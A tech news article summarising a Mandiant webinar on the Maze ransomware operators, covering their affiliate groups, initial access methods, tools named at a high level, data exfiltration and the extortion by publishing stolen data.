Mandiant dishes on notorious Maze ransomware group

Mandiant threat researchers navigate the tools, tactics and procedures of the Maze ransomware group, which has become notorious for "shaming" victims with stolen data.

FireEye's Mandiant Threat Intelligence took a deep dive into the one of the most notorious ransomware groups around: Maze.

In a webinar last Thursday, Mandiant threat intelligence senior manager Kimberly Goody and threat intelligence manager Jeremy Kennelly shared insights into the Maze ransomware gang, including the various tactics, techniques and procedures (TTP) with which the ransomware is deployed. Mandiant has observed Maze ransomware being used in attacks that combine targeted attacks, public exposure of victim data and an affiliate model since November of last year. However, according to Mandiant, malicious actors have been actively deploying Maze ransomware since at least May 2019.

Based on its observations of alleged users in underground hacker forums and distinct TTP across incident response engagements, Mandiant believes there are multiple actors who are involved in Maze ransomware operations. Mandiant found additional information on a public-facing website operated by Maze actors, who post stolen data from victims who refuse to pay an extortion fee.

Maze operators were the first to popularize the tactic of stealing data and combining traditional extortion with the deployment of ransomware. "It started in November 2019 when they posted a warning in a Russian-language forum that they'd release one company's data if they did not pay," Goody said.

In post-compromise methodology, ransomware isn't the first or second stage malware in the victim environment and the goal is to encrypt as many machines as possible. According to Goody, there are numerous advantages to using this methodology, including the ability to search for and exfiltrate data from a victim environment.

Who is behind Maze?

In an accompanying blog post earlier this month, Mandiant said it "identified multiple Russian-speaking actors who claimed to use Maze ransomware and were seeking partners to fulfill different functional roles within their teams. 

During the webinar, Goody and Kennelly shed additional light on Maze threat actors, saying there are three distinct groups under the name. Mandiant researchers are currently tracking three separate clusters of threat activity involved in the post-compromise distribution of Maze ransomware.

The most unique of the three groups is the financially motivated FIN6 group, which has been active since mid-2014, according to Mandiant.

"Unlike other groups that sit alone in clusters connected to only other Maze intrusion operations, FIN6 has a long history of financially motivated intrusions. They had a longtime focus on targeting point of sale (POS) devices, primarily using Trinity or FrameworkPOS [malware]," Kennelly said.

Since 2017, FIN6 techniques have evolved into payment card data targeting, particularly targeting web-based e-commerce platforms to steal credit card numbers or names. Though their tactics shifted, Mandiant observed FIN6 reusing penetration testing tools like Cobalt Strike and Metasploit.

Maze tools and techniques

Through late 2019, before shifting to post-compromise methodology, Maze ransomware was distributed directly via exploit kits and spam campaigns. Now, Mandiant said, common tools include Mimikatz, which is used to extract credentials or tokens and batch scripts to kill processes prior to the execution of ransomware. However, threat researchers have observed a broad range of approaches to network, host, data and active directory reconnaissance across observed Maze incidents.

For example, Kennelly said in the webinar, one thing to note about the second Maze group is its intrusion vector. "In this case, we've seen them access networks via [Trojan] IcedID." In addition, Mandiant observed that specific Maze group only took a small number of days from when it obtained initial access to the environment to when it began active intrusion operations.

Intrusions vary in the way that attackers have obtained initial access, including botnet operators seeking penetration testers to exploit obtained access and penetration testers or other intermediary seeking access to exploit.

"But there are a few clear patterns in the manner in which the initial access is obtained. Banking trojans leading to compromise, initial access coming via compromised web applications and multiple cases where the attacker obtained initial access using legitimate credentials by logging into the corporate VPN infrastructure and/or the corporate system with an internet-facing admin interface. In some cases, it's plausible the accounts have weak passwords and attackers use brute force or credentials have been collected using spear-phishing or via precursor malware operations," Kennelly said in the webinar.

Common tools in earlier stages of intrusion also include open source penetration testing tool Bloodhound and PowerSploit/PowerView. Squidgate and Beacon are commonly used to move laterally throughout the environment.

Data exfiltration and extortion

According to Kennelly, one clear pattern observed across nearly all intrusions was as soon as the data was exfiltrated, the ransomware was deployed. Though exfiltration methods vary, Maze operators have been known to collect data to exfiltrate and upload to an attacker-controlled FTP server. It is common for some actors to use WinSCP and PowerShell scripts in exfiltration, as well as cloud-based file hosting using direct upload or synchronization utility.

Even in different phases of the operations, between initial access and the time active intrusion begins, dwell time can vary dramatically from one day to one year, Kennelly said in the webinar. However, data theft and extortion may increase attacker dwell time.

Mandiant is aware of more than 100 alleged Maze victims reported by various media outlets and on the Maze website since November 2019. Maze operators have become known for data shaming victims, on top of encryption.

"They collect one fee for the agreement not to release files and a separate fee for the encryptor. In December of 2019, operators registered a domain in which would become the centralized location where victims and alleged data stolen from victims would be shared," Goody said in the webinar.

Through that website, Maze operators share domains, dates they encrypted files, volumes, examples of files and a list of impacted systems. Posting information of allegedly compromised organizations increases the pressure for victims to pay.

In order to defend against these attacks, Kennelly said it's not the ransomware that's the issue. "Ransomware is a tool. It's the intrusion operations that proceed it that need to be addressed individually," he said in the webinar.

Next Steps

FireEye and Mandiant part ways in $1.2B deal

Hackers port Cobalt Strike attack tool to Linux

Dig Deeper on Threats and vulnerabilities